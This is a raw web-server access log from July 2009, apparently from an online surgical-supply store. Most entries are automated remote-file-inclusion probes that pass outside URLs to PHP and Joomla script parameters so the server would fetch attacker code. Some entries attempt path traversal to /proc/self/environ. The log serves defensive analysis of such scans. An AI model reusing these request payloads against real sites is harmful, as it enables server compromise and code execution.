83.98.209.71 - - [01/Jul/2009:06:46:54 -0400] "GET /logs/access_log.Q109052800/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:06:46:54 -0400] "GET /logs/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
72.82.228.83 - - [01/Jul/2009:06:46:54 -0400] "GET /logs/access_log.Q109061200%20%20//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:06:47:03 -0400] "GET /logs/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:06:47:06 -0400] "GET /include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:06:47:06 -0400] "GET /logs/access_log.Q109052800/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:06:47:10 -0400] "GET /logs/error_log.Q109052800/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.82.228.83 - - [01/Jul/2009:06:47:11 -0400] "GET /logs/access_log.Q109061200%20%20//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.82.228.83 - - [01/Jul/2009:06:47:14 -0400] "GET /logs/access_log.Q109052200%20%20//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:06:47:19 -0400] "GET /logs/error_log.Q109052800/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.137.160.12 - - [01/Jul/2009:06:47:26 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.172.22.2 - - [01/Jul/2009:06:47:31 -0400] "GET /logs/error_log.Q109062300//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:47:32 -0400] "GET /logs/error_log.Q109062300//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
72.82.228.83 - - [01/Jul/2009:06:47:37 -0400] "GET /logs/access_log.Q109052200%20%20//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.122.79.200 - - [01/Jul/2009:06:47:45 -0400] "GET /logs/access_log.Q109052400//components/com_smf/smf.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.77.32.217 - - [01/Jul/2009:06:47:49 -0400] "GET /logs/access_log.Q109061200%20%20//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
82.214.224.7 - - [01/Jul/2009:06:47:51 -0400] "GET /images/items HTTP/1.1" 301 251 "http://images.search.yahoo.com/images/view?back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dsyring%26b%3D1%26ni%3D20%26ei%3Dutf-8%26pstart%3D1%26fr%3Dyfp-t-203&w=125&h=125&imgurl=www.aceonlinestore.com%2Fimages%2Fitems%2Findex18_syring.jpg&rurl=http%3A%2F%2Fwww.aceonlinestore.com%2Fimages%2Fitems&size=2k&name=index18+syring+j...&p=syring&oid=1269f2f710ada398&fr2=&no=14&tt=4014&b=1&ni=20&sigr=11arqe1lk&sigi=11m5ec2qr&sigb=12ug7pcav" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MEGAUPLOAD 1.0; GTB6; SIMBAR={0BE733B3-7D29-4D31-AFC9-892F18E6D28D}; .NET CLR 2.0.50727)"
82.214.224.7 - - [01/Jul/2009:06:47:51 -0400] "GET /images/items/index18_syring.jpg HTTP/1.1" 200 2264 "http://images.search.yahoo.com/images/view?back=http%3A%2F%2Fimages.search.yahoo.com%2Fsearch%2Fimages%3Fp%3Dsyring%26b%3D1%26ni%3D20%26ei%3Dutf-8%26pstart%3D1%26fr%3Dyfp-t-203&w=125&h=125&imgurl=www.aceonlinestore.com%2Fimages%2Fitems%2Findex18_syring.jpg&rurl=http%3A%2F%2Fwww.aceonlinestore.com%2Fimages%2Fitems&size=2k&name=index18+syring+j...&p=syring&oid=1269f2f710ada398&fr2=&no=14&tt=4014&b=1&ni=20&sigr=11arqe1lk&sigi=11m5ec2qr&sigb=12ug7pcav" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MEGAUPLOAD 1.0; GTB6; SIMBAR={0BE733B3-7D29-4D31-AFC9-892F18E6D28D}; .NET CLR 2.0.50727)"
202.181.243.113 - - [01/Jul/2009:06:48:06 -0400] "GET /logs/access_log.Q109050800%20%20/errors.php?error=http://mexxs.net/images/idade1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.140.23.185 - - [01/Jul/2009:06:48:30 -0400] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
62.140.23.185 - - [01/Jul/2009:06:48:30 -0400] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
62.140.23.185 - - [01/Jul/2009:06:48:30 -0400] "GET /logs/access_log.Q109061600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.803"
62.140.23.185 - - [01/Jul/2009:06:48:30 -0400] "GET /logs/error_log.Q109061600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
211.189.39.159 - - [01/Jul/2009:06:48:46 -0400] "GET /logs/show.php?path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.189.39.159 - - [01/Jul/2009:06:48:46 -0400] "GET /show.php?path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.189.39.159 - - [01/Jul/2009:06:48:46 -0400] "GET /logs/access_log.Q109052100/show.php?path=http://jasek3.fileave.com/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.151.224.247 - - [01/Jul/2009:06:50:12 -0400] "GET /logs/access_log.Q109060100%20%20/rgboard//include/mail.inc.php?skin_board_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.151.224.247 - - [01/Jul/2009:06:50:12 -0400] "GET /rgboard//include/mail.inc.php?skin_board_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.151.224.247 - - [01/Jul/2009:06:50:12 -0400] "GET /logs/rgboard//include/mail.inc.php?skin_board_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.151.224.247 - - [01/Jul/2009:06:50:12 -0400] "GET /logs/access_log.Q109052300%20%20/rgboard//include/mail.inc.php?skin_board_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.151.224.247 - - [01/Jul/2009:06:50:39 -0400] "GET /logs/access_log.Q109060100/rgboard//include/mail.inc.php?skin_board_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.151.224.247 - - [01/Jul/2009:06:50:39 -0400] "GET /logs/access_log.Q109052300/rgboard//include/mail.inc.php?skin_board_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.172.22.2 - - [01/Jul/2009:06:50:40 -0400] "GET /logs/access_log.Q109062200//administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 288 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:06:50:40 -0400] "GET //administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 261 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:06:50:44 -0400] "GET /logs/access_log.Q109062200//administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 288 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:06:50:44 -0400] "GET //administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 261 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [01/Jul/2009:06:50:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.151.224.247 - - [01/Jul/2009:06:51:35 -0400] "GET /logs/access_log.Q109062300/rgboard//include/mail.inc.php?skin_board_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.172.22.2 - - [01/Jul/2009:06:51:48 -0400] "GET //administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:51:57 -0400] "GET //administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:52:16 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 288 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.172.22.2 - - [01/Jul/2009:06:52:16 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 288 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
83.98.209.71 - - [01/Jul/2009:06:52:38 -0400] "GET /logs/error_log.Q109060300%20%20/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:06:52:38 -0400] "GET /logs/access_log.Q109060300%20%20/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.172.22.2 - - [01/Jul/2009:06:53:03 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:53:03 -0400] "GET //administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:53:03 -0400] "GET /logs//administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:53:04 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:53:04 -0400] "GET //administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:53:04 -0400] "GET /logs//administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:53:34 -0400] "GET /logs/error_log.Q109062300//administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
66.172.22.2 - - [01/Jul/2009:06:53:36 -0400] "GET /logs/error_log.Q109062300//administrator/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 287 "-" "libwww-perl/5.805"
83.98.209.71 - - [01/Jul/2009:06:53:36 -0400] "GET /logs/access_log.Q109060300%20%20/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
83.98.209.71 - - [01/Jul/2009:06:53:36 -0400] "GET /logs/error_log.Q109060300%20%20/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
83.16.182.130 - - [01/Jul/2009:06:54:31 -0400] "GET /main.php?pagina=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
83.16.182.130 - - [01/Jul/2009:06:54:31 -0400] "GET /logs/main.php?pagina=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
83.16.182.130 - - [01/Jul/2009:06:54:31 -0400] "GET /logs/access_log.Q109061000%20%20/main.php?pagina=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
83.16.182.130 - - [01/Jul/2009:06:54:31 -0400] "GET /logs/access_log.Q109052900%20%20/main.php?pagina=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
38.99.13.118 - - [01/Jul/2009:06:54:44 -0400] "GET /images/_notes/circle_convention_off.jpg.mno HTTP/1.0" 200 197 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
124.0.136.1 - - [01/Jul/2009:06:55:32 -0400] "GET //bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
124.0.136.1 - - [01/Jul/2009:06:55:32 -0400] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
124.0.136.1 - - [01/Jul/2009:06:55:32 -0400] "GET /logs/error_log.Q109060700//bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
209.59.12.99 - - [01/Jul/2009:06:55:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.16.182.130 - - [01/Jul/2009:06:56:31 -0400] "GET /logs/access_log.Q109061000/main.php?pagina=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
83.16.182.130 - - [01/Jul/2009:06:56:31 -0400] "GET /logs/access_log.Q109052900/main.php?pagina=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
72.30.161.243 - - [01/Jul/2009:06:57:45 -0400] "GET /images/ACE_Orderform.pdf HTTP/1.0" 200 31826 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.231.126.252 - - [01/Jul/2009:06:57:48 -0400] "GET /main.php?pagina=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
220.231.126.252 - - [01/Jul/2009:06:57:48 -0400] "GET /logs/main.php?pagina=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
220.231.126.252 - - [01/Jul/2009:06:57:48 -0400] "GET /logs/access_log.Q109061000/main.php?pagina=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
220.231.126.252 - - [01/Jul/2009:06:57:53 -0400] "GET /logs/access_log.Q109052900/main.php?pagina=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.221.88.162 - - [01/Jul/2009:06:57:55 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
64.221.88.162 - - [01/Jul/2009:06:57:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
64.221.88.162 - - [01/Jul/2009:06:57:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
64.221.88.162 - - [01/Jul/2009:06:57:56 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322)"
79.176.110.203 - - [01/Jul/2009:06:58:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.176.110.203 - - [01/Jul/2009:06:58:55 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.176.110.203 - - [01/Jul/2009:06:59:01 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
79.176.110.203 - - [01/Jul/2009:06:59:01 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
220.231.126.252 - - [01/Jul/2009:06:59:47 -0400] "GET /logs/access_log.Q109061000%20%20/main.php?pagina=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.231.126.252 - - [01/Jul/2009:06:59:47 -0400] "GET /logs/access_log.Q109053000%20%20/main.php?pagina=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [01/Jul/2009:07:00:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.77.32.217 - - [01/Jul/2009:07:01:37 -0400] "GET /logs/error_log.Q109052200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
83.98.209.71 - - [01/Jul/2009:07:01:58 -0400] "GET /logs/access_log.Q109051100/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.94.56.39 - - [01/Jul/2009:07:03:25 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 240 "-" "Mozilla/5.0"
69.94.56.39 - - [01/Jul/2009:07:03:25 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 264 "-" "Mozilla/5.0"
69.94.56.39 - - [01/Jul/2009:07:03:25 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
69.94.56.39 - - [01/Jul/2009:07:03:39 -0400] "GET /logs/access_log.Q109051900%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://highlandquebec.com/Templates/id1.txt? HTTP/1.0" 404 264 "-" "Mozilla/5.0"
202.231.152.147 - - [01/Jul/2009:07:04:07 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; InfoPath.1; IEMB3)"
202.231.152.147 - - [01/Jul/2009:07:04:07 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; InfoPath.1; IEMB3)"
202.231.152.147 - - [01/Jul/2009:07:04:10 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; InfoPath.1; IEMB3)"
202.231.152.147 - - [01/Jul/2009:07:04:10 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; IEMB3; InfoPath.1; IEMB3)"
87.98.222.18 - - [01/Jul/2009:07:04:35 -0400] "GET //components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:04:35 -0400] "GET /logs//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:04:35 -0400] "GET /logs/access_log.Q109062000//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:04:47 -0400] "GET /logs/access_log.Q109052400//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
91.195.124.16 - - [01/Jul/2009:07:05:18 -0400] "GET /logs/access_log.Q109060300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 267 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
91.195.124.16 - - [01/Jul/2009:07:05:18 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
91.195.124.16 - - [01/Jul/2009:07:05:18 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
91.195.124.16 - - [01/Jul/2009:07:05:19 -0400] "GET /logs/access_log.Q109060300/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
91.195.124.16 - - [01/Jul/2009:07:05:19 -0400] "GET /logs/errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
91.195.124.16 - - [01/Jul/2009:07:05:19 -0400] "GET /errors.php?error=http://www.fatemg.edu.br/portal/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
91.195.124.16 - - [01/Jul/2009:07:05:19 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 240 "-" "XXXXXX"
91.195.124.16 - - [01/Jul/2009:07:05:19 -0400] "GET /logs/access_log.Q109060300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 267 "-" "XXXXXX"
91.195.124.16 - - [01/Jul/2009:07:05:19 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 245 "-" "XXXXXX"
91.195.124.16 - - [01/Jul/2009:07:05:19 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 240 "-" "XXXXXX"
91.195.124.16 - - [01/Jul/2009:07:05:19 -0400] "GET /logs/access_log.Q109060300//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 267 "-" "XXXXXX"
91.195.124.16 - - [01/Jul/2009:07:05:19 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "XXXXXX"
72.82.228.83 - - [01/Jul/2009:07:05:22 -0400] "GET /logs/access_log.Q109052200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.249.71.16 - - [01/Jul/2009:07:05:40 -0400] "GET /images/items/0011316_full.jpg HTTP/1.1" 200 2704 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [01/Jul/2009:07:05:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.82.228.83 - - [01/Jul/2009:07:06:02 -0400] "GET /logs/access_log.Q109052200//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:07:30 -0400] "GET /logs/access_log.Q109062000%20%20//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.98.222.18 - - [01/Jul/2009:07:07:30 -0400] "GET /logs/access_log.Q109052400%20%20//components/errors.php?error=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
70.86.9.234 - - [01/Jul/2009:07:09:33 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.86.9.234 - - [01/Jul/2009:07:09:33 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
70.86.9.234 - - [01/Jul/2009:07:09:34 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://scairo.com/templates/beez/copyright.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
